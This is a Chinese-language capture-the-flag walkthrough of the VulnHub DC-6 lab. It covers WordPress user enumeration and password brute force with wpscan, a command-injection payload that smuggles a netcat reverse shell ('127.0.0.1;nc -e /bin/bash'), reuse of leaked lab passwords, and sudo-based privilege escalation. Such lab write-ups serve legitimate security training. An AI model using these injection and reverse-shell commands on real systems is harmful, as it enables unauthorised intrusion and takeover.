下载地址

DC-6.zip (Size: 619 MB)
Download: http://www.five86.com/downloads/DC-6.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip

使用方法:解压后，使用vm直接打开ova文件。

漏洞分析

信息收集

这里还是使用DC-1的方法

1.给靶机设置一个快照

2.fping -agq 192.168.1.0/24 使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下，对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

注：ip段要看自己的

这里只有22和80端口是开启的，这里查看一下网站。

这里出现和dc-2一样的问题，这里修改一下hosts文件就可以了

linux 通常在/etc/hosts
vim /etc/hosts 然后添加一行
靶机ip wordy

这里在网站没有找到什么东西，使用dirsearch扫目录来看看

这里选择的url是http://靶机ip，并不是重定向以后的网址。

这里去访问/wp-login.php，有后台的登入，但是经过访问，尝试弱口令还是不行，准备使用插件wappalyzer看看网站的指纹。

用户和密码爆破

这里看了看决定使用cewl和wpscan的组合。

//根据网页的内容输出一个字典
cewl https://www.wordy.com/ -w pass.txt

//使用命令枚举这个网站的用户
wpscan --url https://www.wordy.com/ -e u  #使用这个没有枚举成功
wpscan --url http://wordy/ -e u  #这个成功了，有点想不明白

//将枚举出来的几个用户输入到user.txt
echo "admin\ngraham\nmark\nsarah\njens" > user.txt

//尝试爆破密码
wpscan --url wordy -U user.txt -P passwd.txt

这里使用cewl获得的字典pass.txt，但是没有破解出来。。。。

去看别人的wp才知道要使用/usr/share/wordlists/rockyou.txt作为字典，但是这个字典很大，我就将一些关于密码的一些提取到一个字典中，这时候我已经知道密码是helpdesk01了

注意：rockyou.txt字典是一个压缩包需要我们自己解压。

//提取相关密码到一个新的字典文件
cat /usr/share/wordlists/rockyou.txt | grep help > passwd.txt

//这里重新爆破
wpscan --url wordy -U user.txt -P passwd.txt

这里爆破出来了,http://wordy/wp-login.php 在这里登录

mark:helpdesk01

命令执行

这里找了半天也不知道那里有漏洞可以利用，多谢别人提醒，不然还不知道要找到什么时候

找到这里有一个命令执行的漏洞

这里看看。

这样就可以了，但是经过测试，这里有长度限制，但是经过查看只有前端的限制，后端没有限制，所以我们就可对前端修改就可以了

方法一：

这里长度限制15，但是我们可以修改。

方法二：

也是可以使用burpsuite来拦包修改，这里没有长度限制。

这里开始反弹shell

127.0.0.1;nc -e /bin/bash ip 端口

//使用python搞一个伪shell
python -c "import pty;pty.spawn('/bin/bash')"

提权

这里原本想先用sudo -l看看有没有什么可以利用的，但是这里我们不知道www-data的密码，这里查看内核版本号，经过查看也没有什么可以利用的。

最后在用户的根目录中发现了可以文件夹，/home/mark/stuff中发现一个things-to-do.txt

这里发现了graham用户的密码,然后我们通过su来到graham用户中

graham:GSo7isUM1D4

在这里发现sudo -l没有需要密码，而且还有东西，这里去看看

//来到提权文件那里
cd /home/jens

//添加可以提权的东西
echo "/bin/bash" >> backups.sh

//这里原本直接提权到root，但是失败了
sudo -u root ./backups.sh

//这里选择到jens中
sudo -u jens ./backups.sh